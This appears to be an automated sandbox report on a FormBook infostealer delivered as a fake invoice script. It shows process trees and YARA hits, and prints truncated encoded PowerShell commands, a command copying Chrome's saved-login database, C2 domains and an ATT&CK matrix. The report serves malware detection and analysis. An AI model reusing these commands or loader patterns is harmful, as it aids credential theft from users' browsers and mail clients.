AHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E9C.tmp" "c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP"
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: explorer.exe, 0000001C.00000000.1713037209.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2196285943.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1859640845.0000000001250000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 0000001C.00000000.1812351909.000000000D42A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1720682575.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2204978943.00000000048E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 0000001C.00000000.1713037209.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2196285943.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1859640845.0000000001250000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 0000001C.00000000.2193873777.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1710641976.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1857434074.0000000000B88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
      Source: explorer.exe, 0000001C.00000000.1713037209.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2196285943.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1859640845.0000000001250000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08350420 CreateNamedPipeW,

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\chkdsk.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts221
      Scripting
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      11
      Deobfuscate/Decode Files or Information
      1
      OS Credential Dumping
      2
      File and Directory Discovery
      Remote Services1
      Archive Collected Data
      Exfiltration Over Other Network Medium3
      Ingress Tool Transfer
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts1
      Shared Modules
      1
      Registry Run Keys / Startup Folder
      713
      Process Injection
      221
      Scripting
      1
      Credential API Hooking
      14
      System Information Discovery
      Remote Desktop Protocol1
      Data from Local System
      Exfiltration Over Bluetooth1
      Encrypted Channel
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts11
      Command and Scripting Interpreter
      Logon Script (Windows)1
      Registry Run Keys / Startup Folder
      4
      Obfuscated Files or Information
      Security Account Manager221
      Security Software Discovery
      SMB/Windows Admin Shares1
      Email Collection
      Automated Exfiltration4
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts2
      PowerShell
      Logon Script (Mac)Logon Script (Mac)1
      DLL Side-Loading
      NTDS12
      Virtualization/Sandbox Evasion
      Distributed Component Object Model1
      Credential API Hooking
      Scheduled Transfer14
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Rootkit
      LSA Secrets2
      Process Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Masquerading
      Cached Domain Credentials1
      Application Window Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items12
      Virtualization/Sandbox Evasion
      DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job713
      Process Injection
      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 623396 Sample: WWVN_INVOICE_8363567453.vbs Startdate: 10/05/2022 Architecture: WINDOWS Score: 100 59 www.thebeautystore.store 2->59 61 www.tandelawnmaintenance.com 2->61 63 15 other IPs or domains 2->63 73 Snort IDS alert for network traffic 2->73 75 Found malware configuration 2->75 77 Malicious sample detected (through community Yara rule) 2->77 79 10 other signatures 2->79 12 wscript.exe 2 2->12         started        signatures3 process4 signatures5 99 Wscript starts Powershell (via cmd or directly) 12->99 101 Very long command line found 12->101 103 Encrypted powershell cmdline option found 12->103 15 powershell.exe 25 12->15         started        process6 signatures7 107 Tries to detect Any.run 15->107 18 ieinstal.exe 6 15->18         started        22 csc.exe 3 15->22         started        25 conhost.exe 15->25         started        27 ieinstal.exe 15->27         started        process8 dnsIp9 65 barsam.com.au 203.170.86.89, 49759, 80 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 18->65 81 Modifies the context of a thread in another process (thread injection) 18->81 83 Tries to detect Any.run 18->83 85 Maps a DLL or memory area into another process 18->85 87 2 other signatures 18->87 29 explorer.exe 4 1 18->29 injected 55 C:\Users\user\AppData\Local\...\gkb1wfd4.dll, PE32 22->55 dropped 33 cvtres.exe 1 22->33         started        file10 signatures11 process12 dnsIp13 67 www.repaircilinic.com 185.53.179.171, 49781, 49782, 80 TEAMINTERNET-ASDE Germany 29->67 69 www.clickleaser.com 198.23.49.173, 49770, 49771, 80 STEADFASTUS United States 29->69 71 5 other IPs or domains 29->71 105 System process connects to network (likely due to code injection or exploit) 29->105 35 chkdsk.exe 1 18 29->35         started        39 ieinstal.exe 29->39         started        41 ieinstal.exe 29->41         started        signatures14 process15 file16 51 C:\Users\user\AppData\...\2LMlogrv.ini, data 35->51 dropped 53 C:\Users\user\AppData\...\2LMlogri.ini, data 35->53 dropped 89 Detected FormBook malware 35->89 91 Tries to steal Mail credentials (via file / registry access) 35->91 93 Tries to harvest and steal browser information (history, passwords, etc) 35->93 95 4 other signatures 35->95 43 cmd.exe 2 35->43         started   